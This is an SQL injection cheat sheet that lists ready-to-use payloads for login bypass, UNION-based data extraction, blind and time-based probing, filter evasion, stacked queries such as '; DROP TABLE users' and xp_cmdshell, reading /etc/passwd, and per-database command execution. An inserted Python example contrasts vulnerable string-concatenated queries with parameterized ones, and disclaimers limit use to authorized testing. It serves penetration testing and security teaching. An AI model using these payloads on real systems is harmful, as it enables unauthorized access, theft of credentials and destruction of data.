SQL injection cheat sheet

Basic SQL Injection

  • ' OR '1'='1
  • ' OR 1=1 --
  • " OR 1=1 --
  • ' OR 'a'='a
  • ') OR ('1'='1

Authentication Bypass

  • ' OR '1'='1' --
  • ' OR '1'='1' /*
  • ' OR 1=1#
  • admin' --
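
Why the entries in this list work, and what stops them, as an added example that is not part of the original cheat sheet: a login query built by string concatenation next to the same query with bound parameters. It assumes an in-memory SQLite database as a stand-in backend; the table, accounts and function names are constructed for the illustration, and only the `--` entries are used because SQLite does not treat `#` as a comment.

```python
import sqlite3

def make_db():
    """In-memory stand-in backend with constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    # Plaintext passwords only to keep the demo short; real systems store hashes.
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "constructed-admin-pw"),
                    ("alice", "constructed-alice-pw")])
    return db

def login_concat(db, username, password):
    """Vulnerable: user input becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # the input broke the statement's syntax
    return row[0] if row else None

def login_param(db, username, password):
    """Hardened: input is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

# Entries from the list above that end in a `--` comment.
PAYLOADS = ["' OR '1'='1' --", "admin' --"]

def compare(payloads=PAYLOADS):
    """Return {payload: (concat_result, param_result)} using a wrong password."""
    db = make_db()
    return {p: (login_concat(db, p, "wrong"), login_param(db, p, "wrong"))
            for p in payloads}

if __name__ == "__main__":
    for payload, (weak, safe) in compare().items():
        print(f"{payload!r:22} concatenated -> {weak!r:8} parameterized -> {safe!r}")
```

With bound parameters the whole input string is compared against the `username` column as a literal value, so the quote and the comment marker never reach the SQL parser.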

UNION-Based SQL Injection

Find column count:

  • ' ORDER BY 1--
  • ' ORDER BY 2--

Using UNION:

  • ' UNION SELECT null, null --
  • ' UNION SELECT 1,2,3 --
  • ' UNION SELECT username, password FROM users --

Error-Based SQL Injection

  • ' AND 1=CONVERT(int, (SELECT @@version)) --
  • ' AND 1=CAST((SELECT user()) AS int) --

Blind SQL Injection

  • ' AND 1=1 -- (True)
  • ' AND 1=2 -- (False)
  • ' AND substring(@@version,1,1)='5' --
  • ' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --

⏱️ Time-Based Blind SQL Injection

  • ' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
  • '; IF (1=1) WAITFOR DELAY '0:0:5'-- (MSSQL)

WAF Bypass & Obfuscation

  • %27 OR %271%27=%271 (URL encoded)
  • '/**/OR/**/'1'='1
  • ' OR 1=1-- -
  • ')/**/OR/**/(1=1)--
  • UN/**/ION SEL/**/ECT

Extracting Data

  • ' UNION SELECT table_name, null FROM information_schema.tables --
  • ' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --
  • ' UNION SELECT username, password FROM users --

Useful Functions (MySQL)

  • database()
  • version()
  • user()
  • @@datadir
  • LOAD_FILE('/etc/passwd')
  • INFORMATION_SCHEMA.TABLES

MySQL Comments & Tricks

  • -- (Comment)
  • # (Comment)
  • /* comment */
  • ' /*!UNION*/ SELECT

Stacked Queries (MSSQL)

  • '; DROP TABLE users --
  • '; EXEC xp_cmdshell('whoami') --

Bypass Filters

  • 'OR'1'='1
  • '||(SELECT 1)=1
  • ' AND CHAR(124)+CHAR(124)+(SELECT 1)=1

Disclaimer

This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.

SQL Injection Cheat Sheet by DBMS

Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.

MySQL

  • Version: SELECT @@version;
  • Current User: SELECT user();
  • Current DB: SELECT database();
  • List DBs: SELECT schema_name FROM information_schema.schemata;
  • List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='target_db';
  • List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
  • Read File: SELECT LOAD_FILE('/etc/passwd');
  • Time Delay: SLEEP(5)
  • Comment Syntax: -- | # | /* */

PostgreSQL

  • Version: SELECT version();
  • Current User: SELECT current_user;
  • Current DB: SELECT current_database();
  • List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='public';
  • List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
  • Time Delay: pg_sleep(5);
  • Command Execution (with permissions): COPY (SELECT '') TO PROGRAM 'id';
  • Comment Syntax: --

Microsoft SQL Server

  • Version: SELECT @@version;
  • Current User: SELECT SYSTEM_USER;
  • Current DB: SELECT DB_NAME();
  • List DBs: SELECT name FROM master..sysdatabases;
  • List Tables: SELECT name FROM sysobjects WHERE xtype='U';
  • Command Execution: EXEC xp_cmdshell 'whoami';
  • Time Delay: WAITFOR DELAY '0:0:5';
  • Comment Syntax: -- | /* */

Oracle

  • Version: SELECT * FROM v$version;
  • Current User: SELECT user FROM dual;
  • Current DB: SELECT ora_database_name FROM dual;
  • List Tables: SELECT table_name FROM all_tables;
  • List Columns: SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE';
  • Time Delay: DBMS_LOCK.SLEEP(5);
  • Command Execution: Java procedures or external tables (if configured)
  • Comment Syntax: -- | /* */

Generic Injection Payloads

  • ' OR '1'='1 --
  • ' OR 1=1 --
  • ' UNION SELECT null,null --
  • ' AND 1=0 UNION SELECT username, password FROM users --

Filter Bypass Tricks

  • '/**/OR/**/'1'='1
  • UNION%0ASELECT
  • ' OR 1=1-- -
  • CHAR(97)+CHAR(98)+CHAR(99) (for 'abc')

⚠️ Disclaimer

This content is for educational and authorized penetration testing only. Do not attempt to exploit systems without proper legal consent.
